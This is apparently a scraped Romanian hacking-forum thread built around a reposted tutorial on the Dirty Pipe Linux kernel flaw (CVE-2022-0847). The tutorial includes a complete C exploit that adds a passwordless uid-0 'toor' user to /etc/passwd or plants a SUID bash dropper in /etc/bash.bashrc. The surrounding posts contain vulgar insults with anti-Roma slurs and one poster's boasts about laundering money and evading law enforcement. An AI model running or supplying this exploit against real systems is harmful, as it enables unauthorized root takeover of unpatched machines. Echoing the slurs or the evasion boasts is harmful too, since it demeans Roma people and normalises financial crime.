Forums

Am auzit ca serverul RST se afla pe insula ta🤣

Inseamna ca eu sunt zeul comentariilor

Eu zic asa...cine n-are minim 64gb de rami in PC, n-are dreptul sa lase comentarii  

Hi, yes, Romania, Bulgaria, Serbia, Albania, Greece - Balkan gyros power ❤️ 

by: Antonius (w1sdom) https://www.bluedragonsec.com https://github.com/bluedragonsecurity   Dirty Pipe (CVE-2022–0847) is one of the most significant security vulnerabilities in Linux Kernel 5.8–5.15.24, discovered by Max Kellermann in 2022. This vulnerability allows ordinary users (without special privileges) to overwrite data in files that should be read-only. 6.3.3.1. Understanding Core Concepts Before discussing Dirty Pipe in detail, here are some Linux kernel internal concepts that need to be understood: 1. Paging Paging is a memory management mechanism in the Linux kernel where the memory system divides physical memory into fixed-size small blocks called page frames, and virtual memory is divided into blocks of the same size called pages. This mechanism allows the kernel to map virtual address space of processes to physical memory in a non-sequential manner, which is crucial for efficiency and security in modern systems. 2. Page (Virtual Memory) In Linux, a page is the smallest unit of physical memory management handled by the kernel. Analogy: RAM is like a giant book. A page is one sheet of paper in that book. The kernel doesn’t move data bit by bit, but rather sheet by sheet (page by page). Generally, on modern system architectures (such as x86_64), the standard size of one page is 4 KB (4096 bytes). 3. Page Cache This is a crucial part. Linux doesn’t read files directly from disk every time because it’s slow. The kernel copies file contents into RAM called the Page Cache. When we read a file, the kernel loads it into the Page Cache. If another process wants to read the same file, the kernel only provides a reference to the page that already exists in that memory. Page cache resides in kernel space. 4. Pipe Buffer Pipe is an Inter-Process Communication (IPC) mechanism. Internally, the kernel manages pipes using the pipe_inode_info data structure. Data inside a pipe is stored in a “buffer” called Pipe Buffer. Ring Buffer: The kernel uses a circular (ring) structure to manage this buffer. A ring buffer is a data structure that uses a single array with a fixed size as if its end is connected back to its beginning. This creates a data flow that “rotates” endlessly. Flags: Each buffer has attributes or “flags” that determine its behavior (for example, whether the buffer can be merged). Pipe buffer resides in kernel space. 5. Pipe Buffer Flag (PIPE_BUF_FLAG_CAN_MERGE) The PIPE_BUF_FLAG_CAN_MERGE flag was introduced in Linux Kernel version 5.8. This is where the main vulnerability lies. The flag named PIPE_BUF_FLAG_CAN_MERGE. Its function: Tells the kernel that new data written to the pipe can be merged into an existing buffer. The problem: Before the Dirty Pipe fix, the kernel did not properly clear (reset) this flag when performing splice(). 6. Splice splice() is a syscall for moving data between two file descriptors without copying the data between kernel space and user space. This is often referred to as a Zero-copy mechanism. The splice() syscall is the “main actor” in Dirty Pipe: Instead of physically copying data, splice() performs optimization by making the Pipe Buffer point directly to the page in the Page Cache. This means the pipe doesn’t contain a copy of the file data, but only a “pointer” to the file’s physical memory. 7. Copy on Write (CoW) The Copy-on-Write (CoW) mechanism is a memory management optimization strategy used by the Linux kernel to delay data copying until absolutely necessary. The relationship between Copy-on-Write (CoW) and the Dirty Pipe exploit (CVE-2022–0847) is about how a small bug in the Linux kernel successfully “tricks” the CoW mechanism, allowing data to be written to files that should be read-only. 8. Dirty Page A dirty page is a memory page in RAM that has been modified by an application, but the changes have not yet been written back to secondary storage (such as SSD or hard disk). 6.3.3.2. Analysis of Dirty Pipe Vulnerability Dirty Pipe is a type of logic bug in pipe buffer handling in Linux kernel 5.8 through Linux kernel 5.15.24. The main problem lies in the Pipe mechanism (inter-process communication channel) and how the kernel manages the Page Cache (memory that stores copies of file data from disk). The core issue is a bug in the PIPE_BUF_FLAG_CAN_MERGE flag. The main problem lies in the kernel’s failure to properly re-initialize this flag (logic bug). Here is the code analysis: In the copy_page_to_iter_pipe and push_to_pipe functions in the Linux kernel before version 5.16.11, when performing splice operations, the kernel prepares the pipe_buffer structure but forgets to clean the .flags member. Vulnerable Code Structure:   Location of problem: fs/pipe.c or include/linux/pipe_fs_i.h // Location of problem: fs/pipe.c or include/linux/pipe_fs_i.h struct pipe_buffer { struct page *page; unsigned int offset, len; const struct pipe_buf_operations *ops; unsigned int flags; // <--- THIS FLAG IS NOT RESET unsigned long private; }; Code Before Patch (Vulnerable): // lib/iov_iter.c - Before CVE-2022-0847 patch static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes, struct iov_iter *i) { // ---------snip----------- struct pipe_buffer *buf = &pipe->bufs[head & mask]; buf->ops = &page_cache_pipe_buf_ops; buf->page = page; buf->offset = offset; buf->len = bytes; // PROBLEM: buf->flags NOT TOUCHED AT ALL // --------snip---------------------- } Code After Patch (Fixed): buf->ops = &page_cache_pipe_buf_ops; buf->page = page; buf->offset = offset; buf->len = bytes; buf->flags = 0; // <--- TOTAL RESET TO ZERO Why is buf->flags = 0 better than just turning off a specific flag? Because pipe_buffer is a reused structure. If we only turn off one flag (CAN_MERGE), other garbage flags from previous pipe usage (such as PIPE_BUF_FLAG_GIFT or other custom flags) might still remain and cause strange behavior or new security holes in the future. Setting it to 0 ensures the buffer is in a completely “clean” state. Why Can This Be Exploited? Here is the Dirty Pipe exploitation flow: Pollution Stage: The attacker inserts data into the pipe via write(). A regular write() operation will set buf->flags = PIPE_BUF_FLAG_CAN_MERGE. Drain Stage: The attacker reads that data. The buffer is now logically “empty”, but its structure still exists in kernel memory with the CAN_MERGE flag still active. Splice Stage: When the splice() syscall maps a read-only file to a pipe, the copy_page_to_iter_pipe() function is called. Due to the bug above, it fills buf->page with the original file’s memory page but doesn’t reset buf->flags. Execution: The kernel thinks this file buffer can still be merged. The next write to the pipe won’t create a new buffer, but will actually modify directly the memory page (Page Cache) that was mapped earlier. At this stage, the attacker’s data is already stored in RAM. A page in RAM whose contents differ from what’s on disk is called a “Dirty Page”. If this stage is successfully reached, it means the exploitation has succeeded! Once the Page Cache changes, the effect is instant. If we overwrite /etc/passwd in RAM, we can immediately run su root at that very moment. 6.3.3.3. Dirty Pipe Exploitation For Dirty Pipe exploitation, we don’t need to disable any kernel protections because all kernel protections are irrelevant to prevent this logic bug. To exploit the Dirty Page logic bug, our exploit will perform the following steps: Step 1. Prepare the pipe and fill the pipe until full with the goal of triggering the PIPE_BUF_FLAG_CAN_MERGE flag. pipe(p); int capacity = fcntl(p[1], 1032); static char dummy[4096]; for (int r = capacity; r > 0; ) { int n = r > sizeof(dummy) ? sizeof(dummy) : r; write(p[1], dummy, n); r -= n; } Step 2. Empty the pipe. for (int r = capacity; r > 0; ) { int n = r > sizeof(dummy) ? sizeof(dummy) : r; read(p[0], dummy, n); r -= n; } Step 3. Use splice() to insert data from the target file into the pipe. if (splice(fd, &offset, p[1], NULL, 1, 0) < 0) { perror("[-] splice failed"); return 0; } Step 4. Write the payload data to the pipe. write(p[1], payload, strlen(payload)); Complete Exploit Code for Dirty Pipe Exploitation /* Exploit Title: Linux Kernel 5.8 < 5.15.25 - Local Privilege Escalation (DirtyPipe 2) Exploit Author: Antonius (w1sdom) github : https://github.com/bluedragonsecurity web : https://www.bluedragonsec.com tested on : - linux kernel 5.13.0-21-generic (compiled on lubuntu 20.04.5) - linux lubuntu 20.04.2 - linux kernel 5.8 Original Author: Max Kellermann (max.kellermann@ionos.com) CVE: CVE-2022-0847 * Copyright 2022 CM4all GmbH / IONOS SE * * author: Max Kellermann <max.kellermann@ionos.com> * * Proof-of-concept exploit for the Dirty Pipe * vulnerability (CVE-2022-0847) caused by an uninitialized * "pipe_buffer.flags" variable. It demonstrates how to overwrite any * file contents in the page cache, even if the file is not permitted * to be written, immutable or on a read-only mount. * * This exploit requires Linux 5.8 or later; the code path was made * reachable by commit f6dd975583bd ("pipe: merge * anon_pipe_buf*_ops"). The commit did not introduce the bug, it was * there before, it just provided an easy way to exploit it. * * There are two major limitations of this exploit: the offset cannot * be on a page boundary (it needs to write one byte before the offset * to add a reference to this page to the pipe), and the write cannot * cross a page boundary. * * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n' * * Further explanation: https://dirtypipe.cm4all.com/ */ #define _GNU_SOURCE #include <unistd.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/utsname.h> #include <ctype.h> int validate_kernv() { struct utsname buffer; int major, minor, patch; int is_vulnerable = 0; char *version_str; int len, compile_year; if (uname(&buffer) != 0) { perror("uname"); return 1; } version_str = buffer.version; len = strlen(version_str); compile_year = 0; for (int i = len - 4; i >= 0; i--) { if (isdigit(version_str[i]) && isdigit(version_str[i+1]) && isdigit(version_str[i+2]) && isdigit(version_str[i+3])) { compile_year = atoi(&version_str[i]); break; } } if (compile_year < 2023) { is_vulnerable = 1; } int fields = sscanf(buffer.release, "%d.%d.%d", &major, &minor, &patch); if (fields < 3) patch = 0; if (major == 5) { if (minor >= 8 && minor <= 14) { is_vulnerable = 1; } else if (minor == 15 && patch < 25) { is_vulnerable = 1; } } else { printf("[-] kernel is not vulnerable !!! quitting ..."); exit(-1); } if (is_vulnerable) { printf("[*] kernel is vulnerable\n"); } else { printf("[-] kernel is not vulnerable !!! quitting ..."); exit(-1); } return 0; } void prepare_pipe(int p[2]) { pipe(p); int capacity = fcntl(p[1], 1032); static char dummy[4096]; for (int r = capacity; r > 0; ) { int n = r > sizeof(dummy) ? sizeof(dummy) : r; write(p[1], dummy, n); r -= n; } for (int r = capacity; r > 0; ) { int n = r > sizeof(dummy) ? sizeof(dummy) : r; read(p[0], dummy, n); r -= n; } } int inject_payload(char *target, char *payload) { int fd = open(target, O_RDONLY); int p[2]; __off64_t offset = 1; prepare_pipe(p); fd = open(target, O_RDONLY); if (fd < 0) return 1; if (splice(fd, &offset, p[1], NULL, 1, 0) < 0) { perror("[-] splice failed"); return 0; } printf("[*] injecting payload to %s\n", target); write(p[1], payload, strlen(payload)); return 1; } void bashrc() { char *target = "/etc/bash.bashrc"; char *payload = "\ncp /bin/bash /tmp/x; chmod +s /tmp/x\n#"; if (inject_payload(target, payload) == 0) { printf("[-] failed to inject payload !"); } else { printf("[*] payload injected to %s\n", target); printf("[*] you need to wait for root to login\n"); printf("[*] once the root logged in you will get suid shell on /tmp/x\n"); printf("[*] get root by : /tmp/x -p\n"); } } int toor_check() { FILE *fp; char path[1035]; fp = popen("su toor -c id", "r"); if (fp == NULL) { return 0; } if (fgets(path, sizeof(path), fp) != NULL) { if (strstr(path, "root")) { return 1; } } pclose(fp); return 0; } int passwd() { char *target = "/etc/passwd"; char *payload = "\ntoor::0:0:root:/root:/bin/bash\n#"; system("cp /etc/passwd /tmp/passwd.bak"); if (inject_payload(target, payload) == 0) { printf("[-] failed to inject payload !"); } if (toor_check() == 1) { printf("[+] exploitation success, getting root for you.\n"); system("su toor"); } else { printf("[-] failed on method 1, testing method 2\n"); return 0; } return 1; } int main() { validate_kernv(); if (passwd() == 0) { bashrc(); } return 0; } Note: The complete exploit code contains functions for kernel version validation, pipe preparation, payload injection, and two different exploitation methods targeting /etc/passwd and /etc/bash.bashrc. Exploitation Methods The exploit above uses 2 different payloads with the goal that if the first payload fails, it will be chained by the second payload. Payload 1: Writes to /etc/passwd to add a new user named ‘toor’ with uid 0. If this payload succeeds, we can immediately get root shell. Payload 2: Aims to drop a SUID bash shell at /tmp/x. Specifically for the second payload, it must wait for the root user on the system to login because the payload to drop the SUID shell is injected into /etc/bash.bashrc. In Linux, commands contained in /etc/bash.bashrc are executed by every user who logs into the system at login time. # Testing the Exploit In this example, I used Linux kernel 5.13 running on Lubuntu 20.04.5 in VirtualBox as a guest OS and the host OS is Kali Linux 2025.4. On the Lubuntu 20.04.5 machine, compile the exploit: gcc -o dirtypipe2 dirtypipe2.c Run the exploit: ./dirtypipe2 and finally, we got root shell : Press enter or click to view image in full size   References Original disclosure: https://dirtypipe.cm4all.com/ CVE-2022–0847: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847 Linux Kernel patch: commit 9d2231c5d74e13b2a0546fee6737ee4446017903 Exploit code: https://github.com/bluedragonsecurity

Hello buddy !  I am from Indonesia,  I am a Chinese born in Indonesia.   I just notice this forum after doing google search for a linux kernel rootkit that I created in 2014.    Here's the topic :    I thinks this forum is cool and it will be nice to register here , in my past time, I have some friends from Europe some Albanian hacker friends in my past time  such as x-hack, danzel a greece friend : getch   is Romania near to Albania and Greece ?

despre tine au facut piesa asta, vad ca iar ai inceput sa scrii gresit, nu-i nicio problema, pana la anul poate mai pui si tu mana pe-o carte, un fraudster de-asta ca tine, cautat global, ar trebui sa aiba destul de mult timp la dispozitie cat sa-si cultive intelectul. din pacate genetic, nu cred ca esti inzestrat, oamenii ca tine, indiferent de cat de tare incearca raman la acelasi nivel, nici banii, nici relatiile nu ii schimba, degeaba scoti sateanul in lume, ca satul din el n-o sa-l poti scoate niciodata .   judeci dupa niste gusturi muzicale prost, ascult rominimal, jazz, acid house si ce mai vrea pula mea, daca-mi vand boxele si amplificatorul iti cumpar garsoniera din cosmopolis.

Sa vina direct vizitatorii nepoftiti sa i iau si pe ei in pula. Cereti ajutor ma frate ca la cati sunteti sigur se indura unu de voi .. si oricum nu mai manca la cacat degeaba cu spalarea ta de bani

Cand ma stiu ca am dosare la FBI si ca scrie 40 de ani pe ele... ce sa fac? Am spalat milioane de euro ca sa mi le confiste astia inapoi? M-am zbatut ani de zile sa spal banii cu atatea afaceri paravan degeaba??? Maximizez si eu tot sa nu ma pomenesc cu diicot-ul si europol-ul la 6 dimineata la cafelutza... nu prea imi plac vizitatori nepoftiti... ca aia nu se descalta si imi murdaresc marmura de pe hol...       Atat de prost esti ca nu stii ca Whonix foloseste Tor. Netul pe cartel 4g/5g merge mai rapid decat Starlink-ul minune si nu pot sa imi faca americani dns hijacking asa.... iar ai nostri nu stiu dastea.   Dupa cum am spus, o parte dintre voi sunteti o cloaca de prosti, infumurati care posteaza manele invechite de 20 de ani. Poate crede-ti ca is vreun pustan din asta. Si la mine in cartier se asculta pe casete cumparate din piata Guta si Copchilu Minune... dar nu toti suntem tigani ca voi... eu am crescut cu bug mafia, puya, 2pac, biggie, nwa etc.. Ce sa fac daca am boala pe tigani borati care posteaza manele invechite pe forumuri ?   Gata! Ne vedem la anul.  V-am pupat pe portofelele goale de bate vantul. Ne vedem la anul ca sa imi spune-ti ce manele sa mai ascult...

Ba Snowden de Berceni, esti definitia in carne si oase a unui skid paranoic: ai citit jumatate de tutorial de opsec, ai cumparat niste crypto si acum crezi ca esti intangibil. In realitate, esti doar un neckbeard cu net de dial-up din '95 care crede ca e Neo, dar e doar un user frustrat care asteapta 10 minute sa se incarce un JPEG. Eu zic sa-ti pui si TOR + Starlink in tot set-up-ul, esti si mai anonim asa.   N-ai vazut 10 mii de euro adunati toata viata ta, esti un sarak, atat mintal cat si sufleteste.    Felicitari ca ai inceput sa scrii mai corect, sunt partial mandru de tine.    stultitiam simulare propter utilitatem